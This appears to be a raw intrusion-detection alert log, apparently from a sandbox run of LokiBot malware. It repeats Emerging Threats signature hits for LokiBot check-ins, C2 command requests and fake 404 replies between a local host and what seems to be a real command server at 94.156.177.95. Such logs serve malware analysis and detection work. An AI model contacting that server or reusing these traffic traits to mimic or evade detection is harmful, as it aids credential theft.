                                                                                                                2024-11-15T18:14:54.538826+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449761TCP
                                                                                                                2024-11-15T18:14:54.694505+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976294.156.177.9580TCP
                                                                                                                2024-11-15T18:14:54.694505+01002025381ET MALWARE LokiBot Checkin1192.168.2.44976294.156.177.9580TCP
                                                                                                                2024-11-15T18:14:54.694505+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976294.156.177.9580TCP
                                                                                                                2024-11-15T18:14:56.696356+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976294.156.177.9580TCP
                                                                                                                2024-11-15T18:14:56.696356+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976294.156.177.9580TCP
                                                                                                                2024-11-15T18:14:56.701607+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449762TCP
                                                                                                                2024-11-15T18:14:56.897576+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976394.156.177.9580TCP
                                                                                                                2024-11-15T18:14:56.897576+01002025381ET MALWARE LokiBot Checkin1192.168.2.44976394.156.177.9580TCP
                                                                                                                2024-11-15T18:14:56.897576+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976394.156.177.9580TCP
                                                                                                                2024-11-15T18:14:57.891299+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976394.156.177.9580TCP
                                                                                                                2024-11-15T18:14:57.891299+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976394.156.177.9580TCP
                                                                                                                2024-11-15T18:14:57.896447+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449763TCP
                                                                                                                2024-11-15T18:14:58.049519+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976594.156.177.9580TCP
                                                                                                                2024-11-15T18:14:58.049519+01002025381ET MALWARE LokiBot Checkin1192.168.2.44976594.156.177.9580TCP
                                                                                                                2024-11-15T18:14:58.049519+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976594.156.177.9580TCP
                                                                                                                2024-11-15T18:14:58.995981+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976594.156.177.9580TCP
                                                                                                                2024-11-15T18:14:58.995981+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976594.156.177.9580TCP
                                                                                                                2024-11-15T18:14:59.001252+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449765TCP
                                                                                                                2024-11-15T18:14:59.161814+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976794.156.177.9580TCP
                                                                                                                2024-11-15T18:14:59.161814+01002025381ET MALWARE LokiBot Checkin1192.168.2.44976794.156.177.9580TCP
                                                                                                                2024-11-15T18:14:59.161814+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976794.156.177.9580TCP
                                                                                                                2024-11-15T18:15:00.107047+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976794.156.177.9580TCP
                                                                                                                2024-11-15T18:15:00.107047+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976794.156.177.9580TCP
                                                                                                                2024-11-15T18:15:00.112387+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449767TCP
                                                                                                                2024-11-15T18:15:00.310997+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977394.156.177.9580TCP
                                                                                                                2024-11-15T18:15:00.310997+01002025381ET MALWARE LokiBot Checkin1192.168.2.44977394.156.177.9580TCP
                                                                                                                2024-11-15T18:15:00.310997+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977394.156.177.9580TCP
                                                                                                                2024-11-15T18:15:01.275023+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977394.156.177.9580TCP
                                                                                                                2024-11-15T18:15:01.275023+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977394.156.177.9580TCP
                                                                                                                2024-11-15T18:15:01.280238+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449773TCP
                                                                                                                2024-11-15T18:15:01.433270+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977994.156.177.9580TCP
                                                                                                                2024-11-15T18:15:01.433270+01002025381ET MALWARE LokiBot Checkin1192.168.2.44977994.156.177.9580TCP
                                                                                                                2024-11-15T18:15:01.433270+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977994.156.177.9580TCP
                                                                                                                2024-11-15T18:15:02.623425+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977994.156.177.9580TCP
                                                                                                                2024-11-15T18:15:02.623425+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977994.156.177.9580TCP
                                                                                                                2024-11-15T18:15:02.623583+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449779TCP
                                                                                                                2024-11-15T18:15:02.774194+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44978594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:02.774194+01002025381ET MALWARE LokiBot Checkin1192.168.2.44978594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:02.774194+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44978594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:03.759207+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44978594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:03.759207+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44978594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:03.765726+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449785TCP
                                                                                                                2024-11-15T18:15:03.942454+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44979594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:03.942454+01002025381ET MALWARE LokiBot Checkin1192.168.2.44979594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:03.942454+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44979594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:04.924439+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44979594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:04.924439+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44979594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:04.930007+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449795TCP
                                                                                                                2024-11-15T18:15:05.073942+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44980294.156.177.9580TCP
                                                                                                                2024-11-15T18:15:05.073942+01002025381ET MALWARE LokiBot Checkin1192.168.2.44980294.156.177.9580TCP
                                                                                                                2024-11-15T18:15:05.073942+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44980294.156.177.9580TCP
                                                                                                                2024-11-15T18:15:06.034036+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44980294.156.177.9580TCP
                                                                                                                2024-11-15T18:15:06.034036+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44980294.156.177.9580TCP
                                                                                                                2024-11-15T18:15:06.039433+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449802TCP
                                                                                                                2024-11-15T18:15:06.199202+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44980894.156.177.9580TCP
                                                                                                                2024-11-15T18:15:06.199202+01002025381ET MALWARE LokiBot Checkin1192.168.2.44980894.156.177.9580TCP
                                                                                                                2024-11-15T18:15:06.199202+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44980894.156.177.9580TCP
                                                                                                                2024-11-15T18:15:07.183769+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44980894.156.177.9580TCP
                                                                                                                2024-11-15T18:15:07.183769+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44980894.156.177.9580TCP
                                                                                                                2024-11-15T18:15:07.188929+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449808TCP
                                                                                                                2024-11-15T18:15:07.370279+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44981394.156.177.9580TCP
                                                                                                                2024-11-15T18:15:07.370279+01002025381ET MALWARE LokiBot Checkin1192.168.2.44981394.156.177.9580TCP
                                                                                                                2024-11-15T18:15:07.370279+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44981394.156.177.9580TCP
                                                                                                                2024-11-15T18:15:08.327887+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44981394.156.177.9580TCP
                                                                                                                2024-11-15T18:15:08.327887+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44981394.156.177.9580TCP
                                                                                                                2024-11-15T18:15:08.333135+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449813TCP
                                                                                                                2024-11-15T18:15:08.480132+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44981894.156.177.9580TCP
                                                                                                                2024-11-15T18:15:08.480132+01002025381ET MALWARE LokiBot Checkin1192.168.2.44981894.156.177.9580TCP
                                                                                                                2024-11-15T18:15:08.480132+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44981894.156.177.9580TCP
                                                                                                                2024-11-15T18:15:09.444469+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44981894.156.177.9580TCP
                                                                                                                2024-11-15T18:15:09.444469+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44981894.156.177.9580TCP
                                                                                                                2024-11-15T18:15:09.449703+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449818TCP
                                                                                                                2024-11-15T18:15:09.759213+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44982594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:09.759213+01002025381ET MALWARE LokiBot Checkin1192.168.2.44982594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:09.759213+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44982594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:10.714557+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44982594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:10.714557+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44982594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:10.720089+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449825TCP
                                                                                                                2024-11-15T18:15:10.869167+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44983294.156.177.9580TCP
                                                                                                                2024-11-15T18:15:10.869167+01002025381ET MALWARE LokiBot Checkin1192.168.2.44983294.156.177.9580TCP
                                                                                                                2024-11-15T18:15:10.869167+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44983294.156.177.9580TCP
                                                                                                                2024-11-15T18:15:11.839294+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44983294.156.177.9580TCP
                                                                                                                2024-11-15T18:15:11.839294+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44983294.156.177.9580TCP
                                                                                                                2024-11-15T18:15:11.845061+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449832TCP
                                                                                                                2024-11-15T18:15:12.002434+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44983694.156.177.9580TCP
                                                                                                                2024-11-15T18:15:12.002434+01002025381ET MALWARE LokiBot Checkin1192.168.2.44983694.156.177.9580TCP
                                                                                                                2024-11-15T18:15:12.002434+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44983694.156.177.9580TCP
                                                                                                                2024-11-15T18:15:12.948556+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44983694.156.177.9580TCP
                                                                                                                2024-11-15T18:15:12.948556+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44983694.156.177.9580TCP
                                                                                                                2024-11-15T18:15:12.953797+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449836TCP
                                                                                                                2024-11-15T18:15:13.104632+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44984194.156.177.9580TCP
                                                                                                                2024-11-15T18:15:13.104632+01002025381ET MALWARE LokiBot Checkin1192.168.2.44984194.156.177.9580TCP
                                                                                                                2024-11-15T18:15:13.104632+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44984194.156.177.9580TCP
                                                                                                                2024-11-15T18:15:14.079858+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44984194.156.177.9580TCP
                                                                                                                2024-11-15T18:15:14.079858+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44984194.156.177.9580TCP
                                                                                                                2024-11-15T18:15:14.085123+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449841TCP
                                                                                                                2024-11-15T18:15:14.236003+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44984994.156.177.9580TCP
                                                                                                                2024-11-15T18:15:14.236003+01002025381ET MALWARE LokiBot Checkin1192.168.2.44984994.156.177.9580TCP
                                                                                                                2024-11-15T18:15:14.236003+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44984994.156.177.9580TCP
                                                                                                                2024-11-15T18:15:15.183719+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44984994.156.177.9580TCP
                                                                                                                2024-11-15T18:15:15.183719+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44984994.156.177.9580TCP
                                                                                                                2024-11-15T18:15:15.188874+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449849TCP
                                                                                                                2024-11-15T18:15:15.349391+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44985594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:15.349391+01002025381ET MALWARE LokiBot Checkin1192.168.2.44985594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:15.349391+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44985594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:16.283700+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44985594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:16.283700+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44985594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:16.288998+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449855TCP
                                                                                                                2024-11-15T18:15:16.433713+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44986094.156.177.9580TCP
                                                                                                                2024-11-15T18:15:16.433713+01002025381ET MALWARE LokiBot Checkin1192.168.2.44986094.156.177.9580TCP
                                                                                                                2024-11-15T18:15:16.433713+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44986094.156.177.9580TCP
                                                                                                                2024-11-15T18:15:17.363462+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44986094.156.177.9580TCP
                                                                                                                2024-11-15T18:15:17.363462+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44986094.156.177.9580TCP
                                                                                                                2024-11-15T18:15:17.368827+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449860TCP
                                                                                                                2024-11-15T18:15:17.538066+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44986594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:17.538066+01002025381ET MALWARE LokiBot Checkin1192.168.2.44986594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:17.538066+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44986594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:18.468562+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44986594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:18.468562+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44986594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:18.474007+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449865TCP
                                                                                                                2024-11-15T18:15:18.633126+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44986994.156.177.9580TCP
                                                                                                                2024-11-15T18:15:18.633126+01002025381ET MALWARE LokiBot Checkin1192.168.2.44986994.156.177.9580TCP
                                                                                                                2024-11-15T18:15:18.633126+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44986994.156.177.9580TCP
                                                                                                                2024-11-15T18:15:19.607161+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44986994.156.177.9580TCP
                                                                                                                2024-11-15T18:15:19.607161+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44986994.156.177.9580TCP
                                                                                                                2024-11-15T18:15:19.612495+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449869TCP
                                                                                                                2024-11-15T18:15:19.765315+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44987594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:19.765315+01002025381ET MALWARE LokiBot Checkin1192.168.2.44987594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:19.765315+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44987594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:20.770567+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44987594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:20.770567+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44987594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:20.775939+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449875TCP
                                                                                                                2024-11-15T18:15:20.938967+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44987994.156.177.9580TCP
                                                                                                                2024-11-15T18:15:20.938967+01002025381ET MALWARE LokiBot Checkin1192.168.2.44987994.156.177.9580TCP
                                                                                                                2024-11-15T18:15:20.938967+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44987994.156.177.9580TCP
                                                                                                                2024-11-15T18:15:21.914705+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44987994.156.177.9580TCP
                                                                                                                2024-11-15T18:15:21.914705+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44987994.156.177.9580TCP
                                                                                                                2024-11-15T18:15:21.920075+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449879TCP
                                                                                                                2024-11-15T18:15:22.075165+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44988494.156.177.9580TCP
                                                                                                                2024-11-15T18:15:22.075165+01002025381ET MALWARE LokiBot Checkin1192.168.2.44988494.156.177.9580TCP
                                                                                                                2024-11-15T18:15:22.075165+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44988494.156.177.9580TCP
                                                                                                                2024-11-15T18:15:23.029911+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44988494.156.177.9580TCP
                                                                                                                2024-11-15T18:15:23.029911+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44988494.156.177.9580TCP
                                                                                                                2024-11-15T18:15:23.035295+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449884TCP
                                                                                                                2024-11-15T18:15:23.183308+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44988894.156.177.9580TCP
                                                                                                                2024-11-15T18:15:23.183308+01002025381ET MALWARE LokiBot Checkin1192.168.2.44988894.156.177.9580TCP
                                                                                                                2024-11-15T18:15:23.183308+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44988894.156.177.9580TCP
                                                                                                                2024-11-15T18:15:24.551139+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44988894.156.177.9580TCP
                                                                                                                2024-11-15T18:15:24.551139+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44988894.156.177.9580TCP
                                                                                                                2024-11-15T18:15:24.556825+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449888TCP
                                                                                                                2024-11-15T18:15:24.806146+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44989594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:24.806146+01002025381ET MALWARE LokiBot Checkin1192.168.2.44989594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:24.806146+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44989594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:25.761835+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44989594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:25.761835+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44989594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:25.767137+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449895TCP
                                                                                                                2024-11-15T18:15:26.050868+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44990094.156.177.9580TCP
                                                                                                                2024-11-15T18:15:26.050868+01002025381ET MALWARE LokiBot Checkin1192.168.2.44990094.156.177.9580TCP
                                                                                                                2024-11-15T18:15:26.050868+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44990094.156.177.9580TCP
                                                                                                                2024-11-15T18:15:27.028960+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44990094.156.177.9580TCP
                                                                                                                2024-11-15T18:15:27.028960+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44990094.156.177.9580TCP
                                                                                                                2024-11-15T18:15:27.034568+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449900TCP
                                                                                                                2024-11-15T18:15:27.207351+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44990594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:27.207351+01002025381ET MALWARE LokiBot Checkin1192.168.2.44990594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:27.207351+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44990594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:28.161346+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44990594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:28.161346+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44990594.156.177.9580TCP
                                                                                                                2024-11-15T18:15:28.166501+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449905TCP
                                                                                                                2024-11-15T18:15:28.328661+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44991194.156.177.9580TCP
                                                                                                                2024-11-15T18:15:28.328661+01002025381ET MALWARE LokiBot Checkin1192.168.2.44991194.156.177.9580TCP
                                                                                                                2024-11-15T18:15:28.328661+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44991194.156.177.9580TCP
                                                                                                                2024-11-15T18:15:29.273083+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44991194.156.177.9580TCP
                                                                                                                2024-11-15T18:15:29.273083+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44991194.156.177.9580TCP
                                                                                                                2024-11-15T18:15:29.278462+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449911TCP
                                                                                                                2024-11-15T18:15:29.444036+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44991894.156.177.9580TCP
                                                                                                                2024-11-15T18:15:29.444036+01002025381ET MALWARE LokiBot Checkin1192.168.2.44991894.156.177.9580TCP
                                                                                                                2024-11-15T18:15:29.444036+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44991894.156.177.9580TCP
                                                                                                                2024-11-15T18:15:30.400380+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44991894.156.177.9580TCP
                                                                                                                2024-11-15T18:15:30.400380+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44991894.156.177.9580TCP
                                                                                                                2024-11-15T18:15:30.406277+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449918TCP
                                                                                                                2024-11-15T18:15:30.558346+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44992394.156.177.9580TCP
                                                                                                                2024-11-15T18:15:30.558346+01002025381ET MALWARE LokiBot Checkin1192.168.2.44992394.156.177.9580TCP
                                                                                                                2024-11-15T18:15:30.558346+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44992394.156.177.9580TCP
                                                                                                                2024-11-15T18:15:32.028611+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44992394.156.177.9580TCP
                                                                                                                2024-11-15T18:15:32.028611+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44992394.156.177.9580TCP
                                                                                                                2024-11-15T18:15:32.033879+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449923TCP
                                                                                                                2024-11-15T18:15:32.185276+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44993294.156.177.9580TCP
                                                                                                                2024-11-15T18:15:32.185276+01002025381ET MALWARE LokiBot Checkin1192.168.2.44993294.156.177.9580TCP
                                                                                                                2024-11-15T18:15:32.185276+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44993294.156.177.9580TCP
                                                                                                                2024-11-15T18:15:33.186723+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44993294.156.177.9580TCP
                                                                                                                2024-11-15T18:15:33.186723+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44993294.156.177.9580TCP
                                                                                                                2024-11-15T18:15:33.192062+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449932TCP
                                                                                                                2024-11-15T18:15:33.342990+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44993694.156.177.9580TCP
                                                                                                                2024-11-15T18:15:33.342990+01002025381ET MALWARE LokiBot Checkin1192.168.2.44993694.156.177.9580TCP
                                                                                                                2024-11-15T18:15:33.342990+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44993694.156.177.9580TCP
                                                                                                                2024-11-15T18:15:34.312997+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44993694.156.177.9580TCP
                                                                                                                2024-11-15T18:15:34.312997+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44993694.156.177.9580TCP
                                                                                                                2024-11-15T18:15:34.318229+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449936TCP
                                                                                                                2024-11-15T18:15:34.461022+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44994294.156.177.9580TCP
                                                                                                                2024-11-15T18:15:34.461022+01002025381ET MALWARE LokiBot Checkin1192.168.2.44994294.156.177.9580TCP
                                                                                                                2024-11-15T18:15:34.461022+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44994294.156.177.9580TCP
                                                                                                                2024-11-15T18:15:35.454641+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44994294.156.177.9580TCP
                                                                                                                2024-11-15T18:15:35.454641+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44994294.156.177.9580TCP
                                                                                                                2024-11-15T18:15:35.460048+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449942TCP
                                                                                                                2024-11-15T18:15:35.606842+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44994994.156.177.9580TCP
                                                                                                                2024-11-15T18:15:35.606842+01002025381ET MALWARE LokiBot Checkin1192.168.2.44994994.156.177.9580TCP
                                                                                                                2024-11-15T18:15:35.606842+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44994994.156.177.9580TCP
                                                                                                                2024-11-15T18:15:36.557201+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44994994.156.177.9580TCP
                                                                                                                2024-11-15T18:15:36.557201+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44994994.156.177.9580TCP
                                                                                                                2024-11-15T18:15:36.562590+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449949TCP
                                                                                                                2024-11-15T18:15:36.942827+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44995694.156.177.9580TCP
                                                                                                                2024-11-15T18:15:36.942827+01002025381ET MALWARE LokiBot Checkin1192.168.2.44995694.156.177.9580TCP
                                                                                                                2024-11-15T18:15:36.942827+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44995694.156.177.9580TCP
